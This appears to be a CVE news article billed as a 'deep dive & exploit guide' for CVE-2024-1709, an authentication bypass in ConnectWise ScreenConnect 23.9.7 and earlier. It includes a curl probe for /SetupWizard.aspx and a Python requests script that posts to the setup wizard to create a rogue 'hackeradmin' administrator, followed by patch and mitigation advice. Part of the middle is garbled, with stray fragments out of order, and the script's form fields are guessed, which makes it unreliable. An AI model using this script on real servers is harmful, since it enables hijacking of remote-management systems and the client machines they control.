CVE CyberSecurity Database News

CVE-2024-1709 - How Hackers Bypass Authentication in ConnectWise ScreenConnect (23.9.7 and Below)—Deep Dive & Exploit Guide

Poster -

ConnectWise ScreenConnect is widely used by IT helpdesks and MSPs for remote desktop and server management. Unfortunately, a major vulnerability—CVE-2024-1709—was recently discovered. This bug lets attackers sneak in through the backdoor, skipping the login prompt entirely. Below, you'll learn what went wrong, how attacks work, how to check if you’re affected, and how attackers exploit this flaw.

What Is CVE-2024-1709? (Simple Terms)

CVE-2024-1709 is an Authentication Bypass Using an Alternate Path or Channel in ConnectWise ScreenConnect versions 23.9.7 and prior. Basically, it means hackers can access the admin system without knowing anyone’s password.

References

- Official Advisory
- MITRE CVE Record
- Rapid7 Blog with Technical Details

How Does the Bypass Work?

The vulnerability lies in how ScreenConnect handles URLs for the setup wizard. Normally, after the first install, only the first setup user can access the “setup” page. But in 23.9.7 and prior, attackers can trick the app into starting the setup wizard again—without authentication—letting anyone create a new admin account.

It all happens because the web route /SetupWizard.aspx can be accessed without any login cookies or tokens, *even on actively used systems*.

Exploiting the Flaw: Walkthrough with Code Snippet

Let’s see how an attacker could use this in the real world.

1. Detecting a Vulnerable Host

A vulnerable ScreenConnect server will usually have /SetupWizard.aspx available.

Try:

curl -k https://target-victim.com/SetupWizard.aspx

If you get a web form (not an error or 403), the door is wide open.

2. Exploit: Creating a New Admin Account

Once you get the Setup Wizard form, you can POST directly to it and set up a new admin account even if others already exist.

Here’s a Python snippet using requests to exploit the bug

import requests

target_url = "https://target-victim.com/SetupWizard.aspx"
session = requests.Session()

# Step 1: GET the SetupWizard page to obtain any cookies or CSRF tokens (if required)
resp = session.get(target_url, verify=False)
# parse resp.text if CSRF/token required

# Step 2: Prepare your admin account details
data = {
    'username': 'hackeradmin',
    'password': 'SuperSecret123!',
    'confirmPassword': 'SuperSecret123!',
    # Other required fields can be found by inspecting the form
}

# Step 3: POST to the SetupWizard endpoint to create the new admin
r = session.post(target_url, data=data, verify=False)
print(r.status_code)
if r.status_code == 200:
    print("Admin account created! Try logging in.")

Now you can log in at /Login using the new credentials.

Viewing sessions

- Downloading files to/from client PCs

Or, scan the page source for references like “ScreenConnect 23.9.7”.

Step 2: Try accessing /SetupWizard.aspx in your browser incognito mode or via curl.

Patches & Mitigation

- Patch: Upgrade to ScreenConnect 23.9.8 or newer.
- Mitigate: Block public access to your ScreenConnect portal, use firewall rules, and restrict to trusted IPs only.

Resources & Exploit Tooling

- Rapid7’s CVE-2024-1709 Research & PoC (Python)
- Huntress Labs Blog (with Shodan queries)
- ConnectWise Security Bulletin

TL;DR

If you run ScreenConnect 23.9.7 or older and your access wizard page is public, attackers can hijack your service in under a minute. Patch, restrict access, and monitor for new, unknown admin accounts ASAP!

Timeline

Published on: 02/21/2024 16:15:50 UTC
Last modified on: 02/23/2024 02:00:01 UTC